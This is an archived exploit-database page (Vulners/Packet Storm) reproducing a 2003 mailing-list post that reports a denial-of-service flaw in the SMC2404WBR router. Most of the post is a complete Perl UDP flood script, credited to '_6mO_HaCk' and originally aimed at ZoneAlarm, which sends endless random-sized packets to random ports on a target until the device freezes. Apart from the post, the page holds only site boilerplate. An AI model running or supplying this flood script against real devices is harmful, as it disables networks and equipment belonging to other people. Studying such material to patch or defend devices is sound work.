Lucene search
K

smc2404WBR.txt

🗓️ 26 Sep 2003 00:00:00Reported by _6mO_HaCkType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 32 Views

Denial of Service exploit for SMC2404WBR router causes freezing until reset needed.

Code
`From: <[email protected]>  
To: [email protected]  
Subject: SMC Router Denial of Service exploit  
  
  
  
Howdy,  
  
Tested on an SMC2404WBR - BarricadeT Turbo 11/22 Mbps Wireless Cable/DSL  
Broadband Router.  
  
Sending a stream of UDP random packets to multiple ports 0-65000 on the  
router will cause the router to freeze until a soft reset is performed on  
it. In one case, the router did survive but did not come back "alive" for  
around 15 minutes. All other tries (2 others) the router had to be reset.  
This attack was performed using the Zonealarm+Windows 98 DoS code written by  
_6mO_HaCk.  
  
The code follows:  
-----------------snip---------------------  
  
#!/usr/bin/perl  
use Socket;  
  
system(clear);  
print "\n";  
print "--- ZoneAlarm Remote DoS Xploit\n";  
print "---\n";  
print "--- Discovered & Coded By _6mO_HaCk\n";  
print "\n";  
if(!defined($ARGV[0]))  
{  
&usage  
}  
  
my ($target);  
$target=$ARGV[0];  
  
my $ia = inet_aton($target) || die ("[-] Unable to resolve  
$target");  
  
socket(DoS, PF_INET, SOCK_DGRAM, 17);  
$iaddr = inet_aton("$target");  
  
print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";  
  
for (;;) {  
$size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x  
$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x  
$rand x $rand;  
$port=int(rand 65000) +1;  
send(DoS, 0, $size, sockaddr_in($port, $iaddr));  
}  
sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}  
-----------------------snip--------------------------------------  
  
Dave, put down the Windows disk Dave. Dave? DAVE?!!? - Hal9000  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Sep 2003 00:00Current
7.4High risk
Vulners AI Score7.4
32